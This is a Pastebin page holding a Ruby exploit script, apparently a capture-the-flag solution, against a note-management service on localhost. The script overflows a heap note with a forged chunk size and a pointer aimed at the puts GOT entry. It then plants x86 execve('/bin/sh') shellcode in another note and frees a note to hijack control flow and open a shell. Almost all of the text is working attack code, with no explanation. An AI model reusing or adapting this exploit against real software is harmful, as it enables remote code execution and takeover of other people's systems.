Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # coding: ascii-8bit
- # Thanks for @Charo_IT
- # https://github.com/Charo-IT/pwnlib
- require 'pwnlib.rb'
- host = "localhost"
- port = 8888
- def setup_notes(tube)
- print tube.recv_until("Please choose an option.\n")
- tube.send("1\n100\n")
- print tube.recv_until("Please choose an option.\n")
- tube.send("1\n100\n")
- print tube.recv_until("Please choose an option.\n")
- tube.send("1\n100\n")
- end
- def change_note(tube, id, data_size, data)
- print tube.recv_until("Please choose an option.\n")
- puts "3"
- tube.send("3\n")
- print tube.recv_until("Please give me an id.\n")
- puts id
- tube.send("#{id}\n")
- print tube.recv_until("Please give me a size.\n")
- puts data_size
- tube.send("#{data_size}\n") #id:1 => 20
- print tube.recv_until("Please input your data.\n")
- puts data
- tube.send("#{data}\n")
- end
- def remove_note(tube, id)
- print tube.recv_until("Please choose an option.\n")
- puts "2"
- tube.send("2\n")
- print tube.recv_until("Please give me an id.\n")
- puts id
- tube.send("#{id}\n")
- end
- PwnTube.open(host, port) do |tube|
- tube.debug = true
- puts_plt = 0x804a008
- setup_notes(tube)
- payload = "JUNK" * 27
- payload << p32(0x79) # size
- payload << p32(puts_plt - 8)
- change_note(tube, 1, payload.length, payload)
- payload = "JUNK" * 27
- payload << "\x31\xd2\x52\x68" + "JUNK" + "\x58" + "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
- change_note(tube, 0, payload.length, payload)
- remove_note(tube, 2)
- tube.shell
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
